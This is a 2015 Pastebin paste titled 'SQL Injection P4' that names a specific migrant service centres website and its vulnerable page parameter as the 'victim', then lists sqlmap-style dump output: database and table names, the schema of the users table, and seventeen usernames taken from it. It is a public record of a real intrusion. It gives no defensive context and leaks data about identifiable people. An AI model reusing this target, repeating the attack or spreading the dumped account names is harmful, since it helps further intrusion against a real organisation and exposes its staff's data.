Advertisement
hackerpham

SQL Injection P4

Aug 21st, 2015
151
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.50 KB | None | 0 0
  1. Victims : http://www.migrantservicecentres.org/index.php?page=69
  2. Exploit : SQL Injection
  3. Database : 2 Database
  4. [+] information_schema
  5. [+] msc
  6. Database: msc
  7. [14 tables]
  8. +-----------------------+
  9. | banned_ipas |
  10. | languages |
  11. | news |
  12. | occstat_1a |
  13. | occstat_1b |
  14. | occstat_1c |
  15. | occstat_1d |
  16. | occstat_1e |
  17. | occstat_2c |
  18. | occstat_2c_list_types |
  19. | occstat_desc |
  20. | occstat_desc_bak |
  21. | pages |
  22. | users |
  23. +-----------------------+
  24.  
  25. Database: msc
  26. Table: users
  27. [9 columns]
  28. +-------------+--------------+
  29. | Column | Type |
  30. +-------------+--------------+
  31. | adminlevel | tinyint(1) |
  32. | description | varchar(255) |
  33. | email | varchar(255) |
  34. | id | bigint(16) |
  35. | ipaddress | varchar(255) |
  36. | lang_id | int(11) |
  37. | password | varchar(255) |
  38. | sid | varchar(255) |
  39. | username | varchar(255) |
  40. +-------------+--------------+
  41. Database: msc
  42. Table: users
  43. [17 entries]
  44. +---------------+
  45. | username |
  46. +---------------+
  47. | Isabel Pastor |
  48. | ahadzovic |
  49. | dqallimi |
  50. | eagich |
  51. | fmarci |
  52. | iknezovic |
  53. | iombelgrade |
  54. | iompodgorica |
  55. | iompristina |
  56. | iomskopje |
  57. | iomskopje1 |
  58. | mscadmin |
  59. | pristine |
  60. | shqipep |
  61. | slolovski |
  62. | spallaska |
  63. | tanja |
  64. +---------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement